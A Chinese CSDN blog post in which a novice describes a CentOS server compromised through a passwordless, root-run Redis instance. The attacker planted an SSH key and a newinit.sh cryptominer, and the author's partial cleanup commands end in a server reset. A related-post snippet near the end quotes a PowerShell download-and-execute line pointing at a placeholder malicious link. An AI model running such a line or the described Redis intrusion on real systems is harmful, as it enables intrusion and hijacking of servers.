挖矿病毒入侵服务器(没有解决,重置服务器了)

已于 2022-05-01 11:04:05 修改
阅读量2.8k 收藏 2
点赞数 3
分类专栏: 安全 文章标签: linux 安全 阿里云
于 2022-04-28 12:52:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46471601/article/details/124471470
版权

昨天邮件收到一封报告服务器被入侵了

服务器系统是:CentOS 7.9 64位

前排提醒!!!最后水平有限没有解决,重置服务器了😓

image-20220428120534217

攻击原理

晚上安装了个Redis,想着只是测试学习集群搭建,测试完就关掉了,所以开放了IP也没有设置密码,并且是 Root用户启动的,没想到在这段时间内
由于服务器Redis服务监听了公网端口未设置访问密码并且其进程启动时使用了root用户,攻击者可远程登录到Redis中,通过Redis内置的命令将自己的公钥写入到/root/.ssh/authorized_keys文件夹下,进而可以直接免密登录到服务器上,并在服务器中植入恶意脚本,实现利用服务器挖矿操作。

排查过程

1.top命令查看cpu占用飙到100%
top

但是竟然没有显示相应的PiD,应该是命令被修改了,所以安装了个新命令 htop

yum  install htop

然后使用htop可以看到占用很高的几个进程,干掉

kill -9 pid
2.查看定时任务
crontab -l

确实有个新增的任务

删除,发现删不掉

crontab -r

头疼

3.找到对应的脚本newinit.sh

查看后发现修改了很多命令,这里只截取一部分

image-20220428123635562

好吧,根据它的修改反着来,先把脚本干掉

rm /etc/newinit.sh

查看文件属性,发现不可删除

lsattr newinit.sh

修改文件属性,去掉多余的

chattr -iae newinit.sh

发现没有权限 ,因为chattr命令也被改了

/usr/bin/chattr,
发现没有执行权限
chmod 500 chattr

或者重新安装chattr,先删除,在安装

yum remove   e2fsprogs
yum intsall  e2fsprogs
4.删除公钥,也要先chattr -i 修改文件属性
cd /root/.ssh/authorized_keys
vim authorized_keys
5.放弃了,改的东西太多了,很多还不会改~
找到有用的文件数据备份到本地,停止服务器,重置云盘或者更换系统
6.教训

虽然只是一个练手的服务器,东西不算特别多,但还是难受啊~~

以后Redis密码一定要设置,并且要够复杂,外部ip访问最好禁止或者设置只可以让你自己的IP访问,阿里云安全组用起来,ip限制,端口限制,偶尔再来个快照备份下最好了

西不算特别多,但还是难受啊~~

以后Redis密码一定要设置,并且要够复杂,外部ip访问最好禁止或者设置只可以让你自己的IP访问,谨慎直接使用Root用户,阿里云安全组用起来,ip限制,端口限制,偶尔再来个快照备份下最好了

本人新手水平,虽然解决不了这个问题,但是再一次让我清晰的认识到这些利益熏心的黑客有多可恶,我们禁止不了它的恶行,只能提高自己的能力和安全意识了,学无止境,加油

服务器是如何被植入挖矿程序的
Amy安的博客
08-17 2396
首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令 "C:\Windows\system32\cmd.exe" /c whoami whoami是操作系统中用于查看当前有效用户名的命令 执行ps命令 powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))" or "C:\Windows\system32\cmd.exe" /c powershell -c "iex(
windows服务器解决挖矿程序问题
cooldream2009的博客
07-19 2367
前几天发现服务器报警,cpu使用率已达100%,查资料知道正是最近比较流行的挖矿程序在捣鬼。我们使用的是阿里云服务器,操作系统是windows server。网上有大量的资料讲如何处理,我把自己处理的思路以及实践过程和大家分享。 1 关闭危险端口 这一步主要是杜绝重复感染,一般挖矿程序都是利用服务器的端口漏洞,将程序放到了服务器上,关闭端口,防止程序重复放到服务器,这样我们就可以关起门来收拾...
服务器挖矿重装系统可以吗,电脑被挖矿了需要重装系统_我网上买了一个重装系统U盘重装系统之后电脑里有一个恶意挖矿软件请问把这个卸载了就可以了吗_区块链百科...
weixin_32836221的博客
08-05 2314
㈠ 一般电脑出现了什么情况下需要重装系统一般情况下电脑出现了以下问题需要重装系统:1、系统文件损坏,不能进入操作系统。2、系统中了病毒,杀毒软件不能处理。3、系统出现各种错误,修改设置比较麻烦,直接重装系统更便捷。4、系统运行变慢,各种垃圾文件增多。5、想要更换为其它版本的系统。6、更换了新硬件,不能进入系统,比如硬盘、显卡等。提示:重装系统会把C盘和桌面上的东西全部删除,重装前应备份重要文件。㈡...
记一次 newinit.sh 相关病毒处理
muyu_feng的博客
09-26 5033
(ps:在这之前经历过五六次木马病毒攻击,都是搞个定时任务下载脚本,然后就拿你服务器搞事情。去年活动 我自己买了一台腾讯云服务器 100多 三年的(巨便宜,现在再也买不到 QAQ)自己玩的。然后服务器挖矿被封了,钱倒是退了,可再也买不到这么便宜的服务起了。因为是刚弄的一台16G服务器,才部署2个项目运行几天一切正常。再次部署多实例时发现,已部署好的服务老是掉,项目日志一切正常,感觉不太正常。去查看 隐藏权限中会多了ai权限 ,它修改了很多文件权限。最后还是CPU100%的问题只能重启服务器,再看就好了。
Centos挖矿病毒处理过程
2301_77388529的博客
04-03 1087
服务器系统中毒后一般会出现异常进程,负载高,CPU占用高,带宽跑满的情况, 为防止你的服务器中招建议服务器 FTP 数据库 网站 Redis等请勿使用简单的密码 轻的只会跑资源 严重的删网站删库 下面说下中毒的处理流程。建议:处理完成之后备份好数据重装系统,病毒作者可能还留有后门,重装系统后加强密码 服务器管理 安装相应的防御软件 希望该教程能让你get到技能。rm /bin/dhpcd ###确定该进程不是自己安装的删除该文件,不确定可以先mv到其他目录。直接使用”dd”,删除计划任务。
入侵检测系统:实时监测与防范网络攻击
a38417的博客
04-28 1587
基于恶意行为进行检测——以ATT&CK框架中定义的入侵模型为参考,结合对于运行时基础事件监控来建立IOC模型进行分析,能有效发现初始入侵时的远程漏洞利用、无文件攻击行为、远程控制的反弹Shell、端口扫描、横向移动、K8S的异常调用等行为。(入侵的响应)入侵检测之后的处理工作,主要包括损失评估,根除入侵者留下的后门,数据恢复,收集入侵者留下的证据等。这是分析传入网络流量的系统。所以,入侵检测显得非常有用了,防火墙管理进入的内容,而入侵检测管理流经系统的内容,一般位于防火墙后面,与防火墙协同工作。
史上最全网络安全面试题汇总 ! !
网安技术分享
08-04 9884
php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗透工具有哪些,最常用的是哪个? burp、nmap、sqlmap、awvs、蚁剑、冰蝎、dirsearch、御剑等等 xs
【2022年最新】网络安全渗透工程师面试题合集
yinjiyufei的博客
12-07 1267
【2022年最新】网络安全渗透工程师面试题合集
200道网络安全常见面试题合集(附答案解析+配套资料)
m0_60571990的博客
03-15 6081
200道网络安全常见面试题合集(附答案解析+配套资料)
常见的网络安全面试题目(个人总结)
weixin_53139899的博客
03-20 4864
本文总结一些常见的安全知识,供大家学习参考!
记录一次挖矿事件
weixin_40368523的博客
05-20 1975
事件参考网上文章解决:https://blog.youkuaiyun.com/mdzz14/article/details/111656726 某一天在测试环境使用dcoker的时候发现不能使用,起初怀疑是否由同事卸载,后续在使用curl命令的时候发现不能使用,怀疑服务器出现了别的异常并在crontab下发现了异常脚本newinit.sh的脚本,证实服务器中了挖矿病毒。 原因:开发在测试环境搭建的redis,服务监听了公网端口未设置访问密码并且其进程启动时使用了root用户,攻击者可远程登录到Redis中,通过R.
centos系统清理挖矿病毒kthreaddk
极客开源之逍遥子
05-15 2080
服务器系统是centos, cpu使用超100%,找到占用cpu的进程kthreaddk, 网上一查原来是挖矿病毒。 分析解决: 找到kthreaddk进程号,kill -9 xxx , 杀掉后马上又重启,杀不死, 猜想是有定时任务,于是执行crontab -e,查看定时任务,果然存在,赶紧删掉,wq 保存 ,然后再次 kill -9 xxx杀掉; 执行top查看发现还是存在继续霸占着cpu,干不掉,继续 crontab -e查看定时任务发现换了目录文件继续存在,看来这样解决是不行的了,网上一搜有..
centos 处理挖矿病毒
weixin_44606690的博客
01-04 838
处理挖矿病毒,真的恶心啊占用CPU百分之50
【清理/etc/newinit.sh】
qq_36769964的博客
08-19 990
清理/etc/newinit.sh。
Linux系统被挖矿木马植入newinit.sh的解决方法
最新发布
Lanson的博客
10-24 837
Linux系统被植入挖矿木马如newinit.sh时,这通常意味着你的系统已经被攻击者入侵并用于非法的加密货币挖矿
服务器遭遇挖矿脚本入侵,歪果仁玩的真花
王声声的博客
03-21 2287
【代码】服务器遭遇挖矿脚本入侵,歪果仁玩的真花。
redis未设置密码被植入挖矿脚本
QQ657205470的博客
03-06 1572
无意间发现启动redis的时候cpu瞬间拉到了100%,主要就是zzh和newinit.sh两个脚本。百度了一下说是被植入了挖矿脚本,是因为redis没有设置密码。参考着搜到的博客处理了问题,但是系统好多命令和配置都被破坏了,还是有必要重装。删除 ia 参数 :chattr -ia zzh ,提示没有权限。然后再回到 etc 目录下,执行 chattr -ia zzh。再执行 cat /etc/crontab ,发现有一条定时任务。在网上搜索 zzh,发现 zzh 是一种挖矿脚本。删除定时任务和这个脚本。
Linux删除——Permission denied
〆`杨陆原じ₯㎕
01-11 3330
rm无法删除文件,通过lsattr -a命令查看文件权限有没有隐藏属性i(记住后面什么也不加) 如果有隐藏的 现在就会会出来 然后又 chattr -iae 文件名 # iae 是根据lsattr -a 出来什么用什么 然后在删除!!!OK!!! ...
一次Linux中的木马病毒解决经历(6379端口---newinit.sh)
weixin_54626591的博客
08-17 831
一次Linux中的木马病毒解决经历(6379端口---newinit.sh)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值